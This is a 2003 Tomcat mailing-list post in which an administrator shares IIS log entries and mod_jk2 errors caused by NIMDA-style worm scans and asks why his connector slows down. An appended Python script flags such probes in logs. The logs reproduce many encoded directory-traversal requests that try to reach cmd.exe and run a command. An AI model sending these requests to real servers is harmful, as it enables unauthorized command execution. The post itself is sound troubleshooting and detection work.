Posted to users@tomcat.apache.org by "Kundrot, Steven" <St...@parexel.com> on 2003/03/05 17:06:45 UTC

IIS, mod_jk2, NIMDA, warnings, weird messages

I'm receiving some interesting warning messages from the mod_jk2 connector
and from IIS in general.

In my IIS Log:

2003-03-04 09:14:08 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /_vti_cnf/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:10 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:11 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /adsamples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:12 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:12 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /c/winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:14 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /cgi-bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:15 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:16 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /d/winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:17 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /iisadmpwd/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:17 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:19 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 - - - 400 -
2003-03-04 09:14:19 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 - - - 400 -
2003-03-04 09:14:21 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:22 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:41 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 - - - 400 -
2003-03-04 09:14:41 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:43 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:14:43 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:15:22 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /samples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:15:24 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:15:25 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:15:25 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /scripts/.%2e/.%2e/winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:15:27 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 - - - 400 -
2003-03-04 09:15:27 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 - - - 400 -
2003-03-04 09:15:29 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:15:30 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:15:30 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /scripts/..%2f../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:15:30 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /scripts/..%5c%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:15:35 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:15:37 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 -
2003-03-04 09:15:43 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 HEAD /scripts/..A..A..A..Awinnt/system32/cmd.exe /c+dir+c:\ 403 -


Note: I've removed the IP addresses from the above messages and replaced
them with xxx.xxx.xxx.xxx.

****************************************************************************

In my Windows Application Event Log:


Error: [jk_isapi_plugin.c (316)]: HttpFilterProc [/scripts/..%5c../winnt/system32/cmd.exe] contains one or more invalid escape sequences.
Error: [jk_isapi_plugin.c (316)]: HttpFilterProc [/scripts/..%5c../winnt/system32/cmd.exe] contains one or more invalid escape sequences.
Emerg:  [jk_isapi_plugin.c (324)]: HttpFilterProc [/scripts/..A/../winnt/system32/cmd.exe] contains forbidden escape sequences.

etc....

These emergencies and errors are followed by many warnings indicating that
the connector workers have failed to forward to my Tomcat instance.  The
workers are later re-enabled.  These warning messages appear about every
4-5 hours.  Initially, they don't seem to affect the Tomcat connector, but
after the warnings are logged, if a user accesses the site, it takes an
exceptionally long time for a page to be served.  In watching the logs, the
connector is reporting a bunch of connection failures, but it eventually
recovers and re-enables.  The site works fine afterwards.  On some
occasions, IIS must be stopped/started in order for the site to behave
normally.  Has anyone else witnessed this in a production environment?  The
kicker is that I cannot reproduce this problem on my development/testing
machines.  I've load tested those environments and the connector is
performing beautifully.  It was once I pushed to production and made IIS
(damn IIS) available to the outside world.  I've searched on the web, and
it seems like these are indications of the NIMDA virus scanning the computer
looking for vulnerabilities.

Has anyone else seen these messages/errors?  Why would they be hurting the
Tomcat connector?  Any suggestions?

Steve
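An added example, not from the post or from the mod_jk2 project, of the triage a defender would run over an IIS W3C log like the one above: it decodes each cs-uri-stem once, tags requests that aim ".." at cmd.exe or winnt/system32, and separately tags percent-escaped path characters and malformed escapes. The two escape rules are my own approximation of what jk_isapi_plugin complains about, not its actual check; the sample lines and IP addresses are constructed.

```python
import re
from urllib.parse import unquote
# Constructed sample lines (not from the post), same W3C field order as the IIS log above:
# date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status ...
SAMPLE_LOG = """\
2003-03-04 09:14:08 10.0.0.5 - 10.0.0.1 80 HEAD /_vti_cnf/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\\ 403 -
2003-03-04 09:14:19 10.0.0.5 - 10.0.0.1 80 - - - 400 -
2003-03-04 09:15:25 10.0.0.5 - 10.0.0.1 80 HEAD /scripts/.%2e/.%2e/winnt/system32/cmd.exe /c+dir+c:\\ 403 -
2003-03-04 09:15:43 10.0.0.5 - 10.0.0.1 80 HEAD /scripts/..A..A..A..Awinnt/system32/cmd.exe /c+dir+c:\\ 403 -
2003-03-04 09:15:50 10.0.0.5 - 10.0.0.1 80 HEAD /cgi-bin/..%5c..%5winnt/system32/cmd.exe /c+dir+c:\\ 403 -
2003-03-04 09:20:01 10.0.0.9 - 10.0.0.1 80 GET /examples/jsp/index.jsp - 200 -
"""

ESCAPED_PATH_CHAR = re.compile(r"%(2e|2f|5c)", re.I)   # '.', '/', '\' hidden behind %-encoding
MALFORMED_ESCAPE = re.compile(r"%(?![0-9A-Fa-f]{2})")  # '%' not followed by two hex digits

def parse_line(line):
    """Split one W3C extended log line into the fields used here; None for blanks and comments."""
    if not line.strip() or line.startswith("#"):
        return None
    f = line.split()
    return {"time": f[0] + " " + f[1], "client": f[2], "method": f[6], "uri": f[7], "status": f[9]}

def is_traversal_probe(uri):
    """Decode once, fold backslashes to '/', then look for '..' aimed at a Windows shell path."""
    decoded = unquote(uri).replace("\\", "/").lower()
    return ".." in decoded and ("cmd.exe" in decoded or "/winnt/system32/" in decoded)

def classify(rec):
    """Tags for one parsed record; an empty tuple means nothing suspicious was seen."""
    uri = rec["uri"]
    if uri == "-":
        return ("malformed-request",)   # IIS logged a status only: no parseable request line
    checks = (("traversal-probe", is_traversal_probe(uri)),
              ("escaped-path-char", bool(ESCAPED_PATH_CHAR.search(uri))),
              ("invalid-escape", bool(MALFORMED_ESCAPE.search(uri))))
    return tuple(tag for tag, hit in checks if hit)

def triage(log_text):
    """Return {client-ip: {tag: count}}; untagged requests count as 'clean'."""
    summary = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        per_ip = summary.setdefault(rec["client"], {})
        for tag in classify(rec) or ("clean",):
            per_ip[tag] = per_ip.get(tag, 0) + 1
    return summary
```

Run against a real log, the per-client counts make a scanner stand out from ordinary traffic even when every probe was answered with 403, which is what the log above shows.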

